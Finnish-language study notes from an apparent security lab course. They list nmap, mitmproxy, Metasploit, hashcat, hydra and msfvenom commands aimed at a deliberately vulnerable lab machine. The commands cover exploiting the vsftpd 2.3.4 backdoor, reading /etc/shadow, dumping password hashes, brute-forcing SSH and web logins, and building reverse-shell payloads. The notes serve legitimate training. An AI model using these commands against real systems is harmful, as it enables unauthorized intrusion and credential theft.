Tuntimuistiinpanoja labraharjoitusta varten

Dumppaan taas kaikki muistiinpanoni tänne, että voin tarpeen vaatiessa hyödyntää niitä huomenna labraharjoitusta tehdessäni.

mitmproxy -p 8088 <-- avaa mitmproxyn porttiin 8088
 set filter =~m post <-- etsii post-pyynnöt <-- hotkey f?
 m <- merkkaa
 shift + m <-- piilota kaikki muut paitsi merkatut
 e <-- edit
 r <-- resend
 shift f <-- following
 set intercept =jokujuttu <-- interceptaa liikenteen joka sisältää jonkunjutun <-- hotkey i

 systemctl restart docker

manuaalista haku kauttaviiva hakusana
 man nmap|grep -i ping| less
 man nmap|grep -C 6 -i stealth
 nmap (-vvv) 10.10.10.140 <-- -vvv verbose
 jos lukee "not shown: 998 closed ports" -> ei ilmeisesti palomuuria
 -n <- yksityisellä ip:llä ei ole julkista nimeä (nimipalvelin ei vastaa) -> voi käyttää -n -> nmap
 ei yritä selvittää nimeä
 time komennon eteen niin näkyy käytetty aika
 nmap -sV <- banner grabbing, mitä palveluita porteista löytyy
 alt + . <- kopioi viimeisen pyynnön parametrin (esim ip, helppo välttää typot)
 nmap -A <- käyttöjärjestelmästä tietoja (about all)
 nmap -sC (ajaa jotkut skriptit??)
 nmap -oA foo <- tallentaa outputit tiedostoihin, joista voi grepata helposti varsinkin .gnmap-tiedostosta
 /nmapped# grep -ir --color apache
 nmap -T3 normaali nopeus -T4 nopeampi ja aggressiivisempi, käytön kanssa pitää olla varovaisempi
 nmap -sU <- tarkistaa UDP:tä, voi sisältää esim DNS:än 
 --top-ports 10 <-- valkkaa vaan 10 yleisintä porttia ja tarkastaa ne, nopeuttaa hakua
 time nmap -sn -n 10.10.10.1-254 -p 80,443
 time nmap 10.10.10.1-254 -vvv -sS -n -Pn -sV -p 80,443 -oA allhttp
 ---- metasploit -----
 msfdb init
 msfconsole
 db_nmap -A -n -vvv 10.10.10.1-254         172.28.128.0/24
 hosts
 services --up
 -p 80,443
 eyewitnessille tiedoston koko polku
 services --up -p 80,443 -R <- laittaa hostsit tiedostoon
 eyewitness -f /url/jonka/ylempi/komento/antaa --web --prepend-https <-- kasaa raportin jossa screenshotit sivuilta
     jos tulee timeout paina enteriä, lukee hostsit siis luodusta tiedostosta

honeynet.org <-honeypot-blogi
 vagrant init
 nano Vagrantfile
 A very vulnerable target computer, package by my student Toni
 Vagrant.configure("2") do |config|
 config.vm.box = "tonijaaskelainen/ms2"
 config.vm.network "private_network", :type => 'dhcp', :adapter => 1
 end
 vagrant up
 ip route
 msfconsole
 hosts -d 10.10.10.* <- deletoi annetut hostit
 db_nmap -A -vvv 172.28.128.0/24
 service postgresql start
 systemctl start postgresql
 hosts
 services --up
 search vsft
 use exploit/unix/ftp/vsftpd_234_backdoor
 options
 set RHOSTS 172.28.128.3
 options
 run
 toivo parasta
 python -c "import pty; pty.spawn('/bin/bash')" // voi olla myös python3
 man foobar | grep hakusana
 use post/multi/manage/shell_to_meterpreter
 sessions
 exploit
 sessions
 sessions 3
 cat /etc/shadow
 
 tarkasta, onko tiedostossa jotain epäilyttävää
 file tiedosto <- kertoo tiedostomuodon
 strings tiedosto <- näyttää tiedoston sisältöä tekstimuodossa
 ghidra-ohjelma <- syötä binääri, saa deobfuskoitua c:tä
 
 youtubesta
 rsa conference 2019
 disobey 2019
 black hat (käyttäjä)


echo -n 'noora' |md5sum -> 5266727ad9bb665e790070bfb4154640
 hashcat --force --show 5266727ad9bb665e790070bfb4154640 sanalista.txt
 echo -n 'noora' |sha512sum / sha256sum / sha384sum / sha1sum
 echo -n 'peruna'|md5sum|tee -a hashes
 echo -n 'turo'|md5sum|tee -a hashes
 echo -n 'network'|md5sum|tee -a hashes
 echo -n '12345'|md5sum|tee -a hashes
 echo -n 'love'|md5sum|tee -a hashes
 echo -n 'password1'|md5sum|tee -a hashes
 hashcat hashes --force sanalista.txt --show
 cp /usr/share/wordlists/rockyou.txt.gz
 gunzip rockyou.txt.gz
 hashcat hashes --force sanalista.txt -o cracked
 hashes-tiedostossa yllättäen hashit
 sanalistassa sanat selkokielisenä
 cracked-tiedostoon tulee murretut salasanat
 
 tarkasta ipcalcilla että private internet ja hoppien määrä
 alt + . <- kopioi edellinen ip-osoite
 
 hydra
 nano users
 hydra -L users -P sanalista.txt ssh://[ip-osoite] -t 4 -I -V
             ftp://[ip-osoite/portti]
 hydra -l username -P /root/Desktop/Test.txt url.zz.za http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
 hydra -l noora -P sanalista.txt ssh://127.0.0.1¨
 meterpreter hashdump kerää hashit
 
 msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o payload.elf
 msfvenom -p windows mitäikinä/x64/meterpreter/reverse_tcp -f exe -o payload.exe
 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf -o payload.elf
 msf5 > use exploit/multi/handler
 msf5 > options
 msf5 >    set LHOST 127.0.0.1
 msf5 > options

Tietoa kirjoittajasta

Noora Huttunen

Opiskelen ohjelmistotuotantoa Haaga-Helian tietojenkäsittelylinjalla.